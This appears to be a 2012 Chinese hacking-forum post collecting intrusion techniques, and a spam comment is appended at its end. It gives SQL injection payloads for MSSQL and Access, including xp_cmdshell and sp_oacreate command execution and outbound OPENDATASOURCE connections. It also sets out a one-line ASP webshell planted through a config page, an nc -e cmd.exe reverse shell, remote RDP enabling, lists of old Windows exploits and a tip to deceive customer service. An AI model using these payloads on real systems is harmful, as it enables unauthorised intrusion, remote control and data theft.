标题: 站库分离的方法 [打印本页] 作者: admin 时间: 2012-9-15 14:41 标题: 站库分离的方法 SA点数据库分离技术相关 3 N! n {2 |: r, j- F. q : m1 C1 d5 P3 d 8 T F6 L: X0 C" ESA点数据库分离搞法+语句:; V! ^: n0 i2 Y9 c! X9 X
$ D( Y. f4 }3 W) T# P* G注射点不显错,执行下面三条语句页面都返回正常。 / r0 u; z+ D2 `% o* f$ Zand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')# ?3 g: r# ~' L$ [8 Q
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')- F# C6 o7 ?- m
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') % ?4 ?9 `9 b' p6 ?* l可以列目录,判断系统为2000,web与数据库分离 # \- a' ]& F* l( _) o0 O! L8 M遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。 4 I: l# z! ^: U在注射点上执行! A; a- P' D# Z) e* r# M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';-- a& F, K; ~9 o3 i k页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP 7 H. ?/ Z6 a. M; @ V还有我用NC监听得其他端口都没有得到IP。" L# p; M4 |0 X% l- e/ a8 S" b
2 h! \, |/ C) v9 H' [9 m U通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。" `+ t b+ h; Z7 T* n z
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--* ?+ E0 b3 D9 t2 D1 l/ N8 D5 E
5 t, t! L( A; i;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--8 j( B, y' n3 u
. A" P/ q+ H _8 p( I6 E/ ?) L现在就猜想是不是数据库是内网而且不能连外网。 J6 p! o/ O& t* A+ S, s% d( U) F- X, n$ B/ d6 t) N
9 Z7 g% W5 h4 U" f8 {: ]
access导出txt文本代码+ _& R0 v0 B5 S7 n7 r) @
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin' ?9 W. Y! Y+ T( v- q
$ }9 U/ J/ K4 T- z/ D
6 |+ f3 N2 K7 X. f& O, ^& n# B3 \: n
自动跳转到指定网站代码头 / P0 G2 Z6 h" d' l: q* e- ]! L/ D7 {<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>' K. l$ r+ t r$ w" N8 Z7 e
/ ~: B1 X; W) |6 ?2 s. |" T2 l) |9 h- {
入侵java or jsp站点时默认配置文件路径:% ?& l8 L4 Q" x/ }% n$ P
\web-inf\web.xml+ ]% x( V' z: e& F) h9 X
tomcat下的配置文件位置:+ {% X/ l( ?2 j5 L9 ~6 X9 m
\conf\server.xml (前面加上tomcat路径)% G* C. Q7 }: j! n/ l" V3 E' E
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml 2 Y4 l; W7 m% J- W 1 ~7 M+ O3 g$ S& L( e) W - H b0 K8 x/ ^# D% o# ^% L 9 u3 I( n6 I* R/ `6 l3 Q1 @检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:5 M# W8 S1 M. p* S' M
-1%23, v4 r) `/ L. s4 [
> 3 L- S9 h4 b/ ]# r
< 8 M5 }# Q, {; d5 @1'+or+'1'='1+ x9 t$ Y' c% s" A, p, J. Z, G
id=8%bf - z! o+ E4 ]2 W ! a, b- q- `4 ^0 R# o/ g全新注入点检测试法:( {6 d8 X: G4 V- b6 h1 k5 \
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。 ; @% H1 V" L, C; n0 h1 Z" e # c; {( f# W' v) H在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。 + J! S6 [; u/ W3 c , S2 f% ^( ^( q# s1 @搜索型注入判断方法: + c& X, e" U: @! d+ a北京%' and '1'='1' and '%'='3 T0 N: J8 I6 G! A. G# t
北京%' and '1'='2' and '%'=' 0 {/ H2 K2 }7 F. Q8 C; ~; L- ^) B b0 Y8 i! _1 T' E6 o
0 g0 F0 }9 J1 }# x E7 h
COOKIES注入: , r+ y/ N% Q6 h% p" l. a# X; ]1 c+ G* Z' `) [" V, n( g: `+ k4 Z/ n
javascript:alert(document.cookie="id="+escape("51 and 1=1"));5 @5 r3 N$ j8 L
5 \7 B* e4 e2 S- U, F! i. O1 G
2000专业版查看本地登录用户命令:3 Z8 S2 O- m/ M. o2 n# c+ D: ?6 m& ]
net config workstation w- Q5 Q" Q. n D) K" D. ?& X) a1 h* \! u- t' g. N" q! x: t1 { Z, x5 |1 `
2003下查看ipsec配置和默认防火墙配置命令:% i3 j: O3 U% X3 Q4 X
netsh firewall show config( D; O; g* {( u% Y7 q9 x
netsh ipsec static show all' y- I: E: c% |/ Z
, d. L- r* h# O) f不指派指定策略命令: ! d7 J( ?, Y* G8 {* w5 anetsh ipsec static set policy name=test assign=n (test是不指派的策略名) 4 x) ] o3 d7 ?netsh ipsec static show policy all 显示策略名 $ h4 ^ w, S }) B) ]1 f$ r8 R8 X5 K" r2 N$ W8 a7 B: f
1 c) V5 a# M/ J# d, e猜管理员后台小技巧: $ }5 c; E2 g: z4 @( kadmin/left.asp * z$ K- P- y. o' x, ^admin/main.asp0 K) E; k W6 }+ U5 [4 L
admin/top.asp ' E+ J4 G5 E2 y6 G. }. J, Zadmin/admin.asp , n! z9 U. p+ j( e- p- |3 r7 s: v8 z
会现出菜单导航,然后迅雷下载全部链接 0 ?, e6 l0 Y2 @8 T; W% B0 X" J8 ^" J4 {8 m
" r. z/ h; s. M0 r/ ~! r社会工程学:9 h$ k5 s& y4 F: _
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人! D2 N2 g( K' F$ J. C0 F* ^
然后去骗客服 8 F& ?" a* _) I8 B6 l 2 V: l r0 H' U% N- n7 d% N6 P* E0 o( s
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 1 C; b: w, o) i! G2 K# Q查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 5 U* p0 X( J1 y1 U# k- B 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。/ _' `( h6 k0 K( [; G
& q$ s3 S7 J( ^: N, ? , @/ ]5 V) v" b% C4 l" t) n' u8 d
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查) & Y5 ?. }9 c! Z. Z0 B, g5 T* l( {; l) v
/ h+ S' v8 F3 Amstsc /v:IP /console & @% z+ [2 N4 }8 N: E; H# u! q ~ C) p
( G D9 S# t/ l8 {2 G4 N1 Y5 C* v
一句话开3389: / ?4 o9 `" a, Y( }/ t ) E2 _' |7 X; j4 d, V1 K% u最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> ! R! z" C5 f. m- r" }开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了. 2 j0 |0 a- a2 y! X% d8 ]" J! T% S. f0 ~1 t. i) P1 m4 B% p
% q- D" [( q0 `4 I知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下: 8 ?2 {8 F* L5 i8 X }2 p2 G7 yInsert into admin(user,pwd) values('test','test') " a7 ?& f1 Q7 m0 H9 ~, j |1 @: ~% A y; V9 p
0 N4 y1 H) T& B5 ~NC反弹 " M& n e( a$ {# ~8 O3 ^先在本机执行: nc -vv -lp 监听的端口 (自己执行) 5 ?) ?9 V/ X) ^% i. ^. n. L
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)# Z5 x+ k+ ~4 Y/ T% `" V
# Z2 [4 X2 \, ~3 ^. p1 S" l; M P8 W, ]# H/ k
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题 * R4 Y- U5 @+ K/ k& ^7 e6 [! w7 { # C) j h4 h) D5 L4 u/ H- O$ n有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录 : _$ _( `' a$ O' s" H, N: p6 K例如:/ K, C/ |! w1 Z+ j# J1 _' I7 h
subst k: d:\www\ 用d盘www目录替代k盘 - t! U2 W0 c& E, jsubst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta